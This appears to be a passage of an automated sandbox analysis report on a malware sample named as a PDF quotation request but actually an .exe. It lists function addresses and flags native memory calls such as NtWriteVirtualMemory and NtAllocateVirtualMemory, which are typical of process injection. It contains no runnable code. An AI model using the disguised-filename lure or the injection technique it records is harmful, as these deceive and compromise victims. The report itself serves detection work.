Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7790 0_2_020B7790
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9481 0_2_020B9481
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94CA 0_2_020B94CA
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94C8 0_2_020B94C8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B84C5 0_2_020B84C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94D5 0_2_020B94D5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94E1 0_2_020B94E1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B74FD 0_2_020B74FD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B74F1 0_2_020B74F1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B850C 0_2_020B850C
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B752E 0_2_020B752E
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7539 0_2_020B7539
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7545 0_2_020B7545
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7568 0_2_020B7568
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BB562 0_2_020BB562
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8594 0_2_020B8594
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85AD 0_2_020B85AD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85A1 0_2_020B85A1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85B9 0_2_020B85B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B75E9 0_2_020B75E9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A01 0_2_020B9A01
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A04 0_2_020B9A04
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A1D 0_2_020B9A1D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A12 0_2_020B7A12
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A11 0_2_020B9A11
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A29 0_2_020B9A29
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A35 0_2_020B9A35
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A7D 0_2_020B7A7D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A71 0_2_020B7A71
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A75 0_2_020B9A75
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A89 0_2_020B7A89
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A8D 0_2_020B9A8D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A81 0_2_020B9A81
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7AED 0_2_020B7AED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9B25 0_2_020B9B25
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9B3D 0_2_020B9B3D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B4D 0_2_020B7B4D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B41 0_2_020B7B41
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B59 0_2_020B7B59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9B60 0_2_020B9B60
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B65 0_2_020B7B65
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9B7D 0_2_020B9B7D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9B71 0_2_020B9B71
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9B89 0_2_020B9B89
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BDB82 0_2_020BDB82
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9B98 0_2_020B9B98
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BBD 0_2_020B7BBD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BC9 0_2_020B7BC9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9BDA 0_2_020B9BDA
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BD5 0_2_020B7BD5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BE1 0_2_020B7BE1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9BE5 0_2_020B9BE5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9BFD 0_2_020B9BFD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9BF1 0_2_020B9BF1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B782D 0_2_020B782D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BD872 0_2_020BD872
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7880 0_2_020B7880
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7899 0_2_020B7899
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B78A5 0_2_020B78A5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B98DD 0_2_020B98DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7915 0_2_020B7915
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B792D 0_2_020B792D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7921 0_2_020B7921
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9979 0_2_020B9979
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B799D 0_2_020B799D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7991 0_2_020B7991
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9991 0_2_020B9991
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B79A9 0_2_020B79A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99BD 0_2_020B99BD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99DD 0_2_020B99DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99D0 0_2_020B99D0
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99E9 0_2_020B99E9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99F5 0_2_020B99F5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E40 0_2_020B7E40
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E47 0_2_020B7E47
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E59 0_2_020B7E59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E65 0_2_020B7E65
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E79 0_2_020B7E79
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7EC2 0_2_020B7EC2
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F3D 0_2_020B7F3D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F31 0_2_020B7F31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B6F8A 0_2_020B6F8A
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F81 0_2_020B7F81
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B6F95 0_2_020B6F95
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B6FA1 0_2_020B6FA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7FA5 0_2_020B7FA5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9C09 0_2_020B9C09
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C3D 0_2_020B7C3D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C31 0_2_020B7C31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C7A 0_2_020B7C7A
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9C88 0_2_020B9C88
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C85 0_2_020B7C85
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9C95 0_2_020B9C95
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7CA9 0_2_020B7CA9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CAD 0_2_020B9CAD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CA1 0_2_020B9CA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8CFB 0_2_020B8CFB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CFD 0_2_020B9CFD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CF1 0_2_020B9CF1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9D09 0_2_020B9D09
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D25 0_2_020B7D25
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D31 0_2_020B7D31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FFD9 8_2_0056FFD9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FFC0 8_2_0056FFC0
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FFE5 8_2_0056FFE5
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B2725 NtWriteVirtualMemory,TerminateProcess, 0_2_020B2725
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9405 NtAllocateVirtualMemory, 0_2_020B9405
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEA59 NtWriteVirtualMemory,NtProtectVirtualMemory, 0_2_020BEA59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEF41 NtOpenFile, 0_2_020BEF41
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8209 NtWriteVirtualMemory, 0_2_020B8209
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8215 NtWriteVirtualMemory, 0_2_020B8215
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8221 NtWriteVirtualMemory, 0_2_020B8221
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B826D NtWriteVirtualMemory, 0_2_020B826D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8279 NtWriteVirtualMemory, 0_2_020B8279
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8285 NtWriteVirtualMemory, 0_2_020B8285
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B82ED NtWriteVirtualMemory, 0_2_020B82ED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B82F9 NtWriteVirtualMemory, 0_2_020B82F9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8308 NtWriteVirtualMemory, 0_2_020B8308
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8369 NtWriteVirtualMemory, 0_2_020B8369
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B83E1 NtWriteVirtualMemory, 0_2_020B83E1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8031 NtWriteVirtualMemory, 0_2_020B8031
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8086 NtWriteVirtualMemory, 0_2_020B8086
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B809D NtWriteVirtualMemory, 0_2_020B809D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8091 NtWriteVirtualMemory, 0_2_020B8091
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B80A9 NtWriteVirtualMemory, 0_2_020B80A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8105 NtWriteVirtualMemory, 0_2_020B8105
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B811D NtWriteVirtualMemory, 0_2_020B811D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8111 NtWriteVirtualMemory, 0_2_020B8111
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8129 NtWriteVirtualMemory, 0_2_020B8129
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81B9 NtWriteVirtualMemory, 0_2_020B81B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81C5 NtWriteVirtualMemory, 0_2_020B81C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81DD NtWriteVirtualMemory, 0_2_020B81DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81D1 NtWriteVirtualMemory, 0_2_020B81D1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81F8 NtWriteVirtualMemory, 0_2_020B81F8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8609 NtWriteVirtualMemory, 0_2_020B8609
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B760D NtWriteVirtualMemory, 0_2_020B760D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7619 NtWriteVirtualMemory, 0_2_020B7619
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8615 NtWriteVirtualMemory, 0_2_020B8615
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9629 NtAllocateVirtualMemory, 0_2_020B9629
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B862D NtWriteVirtualMemory, 0_2_020B862D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8621 NtWriteVirtualMemory, 0_2_020B8621
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7625 NtWriteVirtualMemory, 0_2_020B7625
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7631 NtWriteVirtualMemory, 0_2_020B7631
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9635 NtAllocateVirtualMemory, 0_2_020B9635
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B964D NtAllocateVirtualMemory, 0_2_020B964D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9641 NtAllocateVirtualMemory, 0_2_020B9641
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7664 NtWriteVirtualMemory, 0_2_020B7664
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9685 NtAllocateVirtualMemory, 0_2_020B9685
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76B9 NtWriteVirtualMemory, 0_2_020B76B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76C5 NtWriteVirtualMemory, 0_2_020B76C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B86C4 NtWriteVirtualMemory, 0_2_020B86C4
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76DD NtWriteVirtualMemory, 0_2_020B76DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76D1 NtWriteVirtualMemory, 0_2_020B76D1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B96FD NtAllocateVirtualMemory, 0_2_020B96FD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B86FC NtWriteVirtualMemory, 0_2_020B86FC
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B870C NtWriteVirtualMemory, 0_2_020B870C
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B871D NtWriteVirtualMemory, 0_2_020B871D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8729 NtWriteVirtualMemory, 0_2_020B8729
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7739 NtWriteVirtualMemory, 0_2_020B7739
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8735 NtWriteVirtualMemory, 0_2_020B8735
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7745 NtWriteVirtualMemory, 0_2_020B7745
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B775D NtWriteVirtualMemory, 0_2_020B775D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7751 NtWriteVirtualMemory, 0_2_020B7751
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B776E NtWriteVirtualMemory, 0_2_020B776E
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7790 NtWriteVirtualMemory, 0_2_020B7790
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9481 NtAllocateVirtualMemory, 0_2_020B9481
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94CA NtAllocateVirtualMemory, 0_2_020B94CA
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94C8 NtAllocateVirtualMemory, 0_2_020B94C8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B84C5 NtWriteVirtualMemory, 0_2_020B84C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94D5 NtAllocateVirtualMemory, 0_2_020B94D5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94ED NtAllocateVirtualMemory, 0_2_020B94ED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94E1 NtAllocateVirtualMemory, 0_2_020B94E1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B74FD NtWriteVirtualMemory, 0_2_020B74FD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B74F1 NtWriteVirtualMemory, 0_2_020B74F1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B850C NtWriteVirtualMemory, 0_2_020B850C
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9518 NtAllocateVirtualMemory, 0_2_020B9518
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B752E NtWriteVirtualMemory, 0_2_020B752E
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7539 NtWriteVirtualMemory, 0_2_020B7539
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7545 NtWriteVirtualMemory, 0_2_020B7545
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B959E NtAllocateVirtualMemory, 0_2_020B959E
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8594 NtWriteVirtualMemory, 0_2_020B8594
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95A9 NtAllocateVirtualMemory, 0_2_020B95A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85AD NtWriteVirtualMemory, 0_2_020B85AD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85A1 NtWriteVirtualMemory, 0_2_020B85A1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85B9 NtWriteVirtualMemory, 0_2_020B85B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95B5 NtAllocateVirtualMemory, 0_2_020B95B5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95CD NtAllocateVirtualMemory, 0_2_020B95CD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95C1 NtAllocateVirtualMemory, 0_2_020B95C1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B75E9 NtWriteVirtualMemory, 0_2_020B75E9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A12 NtWriteVirtualMemory, 0_2_020B7A12
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A7D NtWriteVirtualMemory, 0_2_020B7A7D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A71 NtWriteVirtualMemory, 0_2_020B7A71
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A89 NtWriteVirtualMemory, 0_2_020B7A89
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7AED NtWriteVirtualMemory, 0_2_020B7AED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B4D NtWriteVirtualMemory, 0_2_020B7B4D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B41 NtWriteVirtualMemory, 0_2_020B7B41
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B59 NtWriteVirtualMemory, 0_2_020B7B59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B65 NtWriteVirtualMemory, 0_2_020B7B65
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BBD NtWriteVirtualMemory, 0_2_020B7BBD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BC9 NtWriteVirtualMemory, 0_2_020B7BC9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BD5 NtWriteVirtualMemory, 0_2_020B7BD5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BE1 NtWriteVirtualMemory, 0_2_020B7BE1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B782D NtWriteVirtualMemory, 0_2_020B782D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B887D NtWriteVirtualMemory, 0_2_020B887D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7880 NtWriteVirtualMemory, 0_2_020B7880
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7899 NtWriteVirtualMemory, 0_2_020B7899
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B78A5 NtWriteVirtualMemory, 0_2_020B78A5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7915 NtWriteVirtualMemory, 0_2_020B7915
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B792D NtWriteVirtualMemory, 0_2_020B792D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7921 NtWriteVirtualMemory, 0_2_020B7921
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B799D NtWriteVirtualMemory, 0_2_020B799D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7991 NtWriteVirtualMemory, 0_2_020B7991
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B79A9 NtWriteVirtualMemory, 0_2_020B79A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E40 NtWriteVirtualMemory, 0_2_020B7E40
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E47 NtWriteVirtualMemory, 0_2_020B7E47
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E59 NtWriteVirtualMemory, 0_2_020B7E59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E65 NtWriteVirtualMemory, 0_2_020B7E65
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E79 NtWriteVirtualMemory, 0_2_020B7E79
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7EC2 NtWriteVirtualMemory, 0_2_020B7EC2
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F3D NtWriteVirtualMemory, 0_2_020B7F3D
